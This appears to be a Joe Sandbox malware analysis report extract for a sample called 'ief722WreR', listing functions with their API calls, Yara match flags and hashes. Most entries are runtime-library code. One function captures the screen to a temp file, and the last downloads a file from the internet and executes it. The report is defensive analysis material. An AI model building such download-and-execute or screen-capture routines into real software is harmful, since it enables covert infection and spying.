Function 024908CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410672,0248FE60), ref: 024908D2

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBC1

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Function 004071AB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Function 024A76EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction ID: b9dde2cb8ec5e47059e822cff3b1413f3dc4673ccaa64d593e325bcd1b1b7be9
Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction Fuzzy Hash: 61D1C7322085A24EDB3D4A39847003FFFF1AA621A530D479FD8F7CA6C6EE24D595D660

Function 00427D67 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624

Function 024A7FCE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 5ac7f2a9e59a8602cade0463bed8eecf15c6b405b6f14f5b51fff65f5b8fc904
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: C39136721090A34AE76E463E847513FFFE1DA612A530A079FD4F3CA2C5EF24D5A5DA20

Function 00428022 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628

Function 024A8289 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 69c8c12ab4cd9361c634d874c37384b1242b2d74bc424703cf95b13c0a97f286
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 1E9152721090E34AEB69467E853413FFFE1DA622A530A07AFD4F2CA2C5FF24C565D620

Function 00427AA0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628

Function 024A7D07 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 1b0e5a1432efdb955494ef33638bab052ade4cd867fb28aa86128775c2a79699
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 649131722090A30AEB79463D857413FFEE19A611A570A079FE4F3CF2C5EF24D655D620

Function 0042D4EE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E

Function 024AD755 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: 5f9d72d340cd0d95e81e904500351da7244a860c49d46dc476b9cfacc41c856c
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: 5B615435E00B04D6DB386A2888B0BBF6399AF75A08F44041FE893DBFD4D715D982CB55

Function 004277F6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Function 024A7A5D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 40fef48657afa0c07b793ed553198580fd63280cf07076a7908ae453cb7e4604
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 2B8152722090E34AEB79467E847413FFFE15A621A630A079FD4F3CB2C5EF248665D620

Function 00428560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Function 024A87C7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: b549e255c62728a56516a23b7752254fdb945a80926b464c3fcfcc8976473489
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: B511277720104247D618CA3ED8B42BBE795FBE6228B2C567FD0514F758EB22E145D600

Function 00AF956B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_af9000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 704771670929f8298fdd1f736728e61dc5e77a1719a4606374c45c7357fc8bbf
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 61115E723401049FDB44DF95DC81FA773AAEB88320B298055FE08CB356D676E805CB60

Function 02480D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 34064763689ac3de6fc2931be55773beff4606bcf56ef1d504eadd77b2d196bf
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 2E01F272A306008FDF21EF20C905BBF33E5FB86306F0550A6D90A97381E370A8498B80

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 024AE919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024AE989
_free.LIBCMT ref: 024AE99F
_free.LIBCMT ref: 024AE9B0
_free.LIBCMT ref: 024AE9C1
_free.LIBCMT ref: 024AE9D8
GetCPInfo.KERNEL32(?,?), ref: 024AEA20

Part of subcall function 024B6952: _free.LIBCMT ref: 024B69BD

_free.LIBCMT ref: 024AEBCC
_free.LIBCMT ref: 024AEBDF
_free.LIBCMT ref: 024AEBED
_free.LIBCMT ref: 024AEBF8
_free.LIBCMT ref: 024AEC3A
_free.LIBCMT ref: 024AEC42
_free.LIBCMT ref: 024AEC4A
_free.LIBCMT ref: 024AEC52
_free.LIBCMT ref: 024AEC60

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: 5e1dfd718b7591f1d46bb441e6ccfc8cf8dd2dd5689df997bbd09cf117d9b2ec
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: 42B18E71A002099FDB22DFB9C890BEEBBF5BF18304F14456EE4A5A7341D775A841DB60

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 024BA85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 024BA8A3

Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C0F
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C21
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C33
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C45
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C57
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C69
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C7B
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C8D
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C9F
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CB1
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CC3
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CD5
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CE7

_free.LIBCMT ref: 024BA898

Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9

_free.LIBCMT ref: 024BA8BA
_free.LIBCMT ref: 024BA8CF
_free.LIBCMT ref: 024BA8DA
_free.LIBCMT ref: 024BA8FC
_free.LIBCMT ref: 024BA90F
_free.LIBCMT ref: 024BA91D
_free.LIBCMT ref: 024BA928
_free.LIBCMT ref: 024BA960
_free.LIBCMT ref: 024BA967
_free.LIBCMT ref: 024BA984
_free.LIBCMT ref: 024BA99C

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 92d23df85c1984dc914b7e8637133f71fc969108bfee2958722c8502051df644
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: 1D317C316002109FEB32AF3AD844BDBB7E9AF04750F15486FE449D7750DB71A851EA74

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 02482C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02482C7E
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02482C94
GetTempPathW.KERNEL32(00000105,?), ref: 02482CB0
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02482CC6
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02482CFF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02482D3B
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02482D58
ShellExecuteExW.SHELL32(?), ref: 02482DCF
WaitForSingleObject.KERNEL32(?,00008000), ref: 02482DE4

Strings

<, xrefs: 02482DAC

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
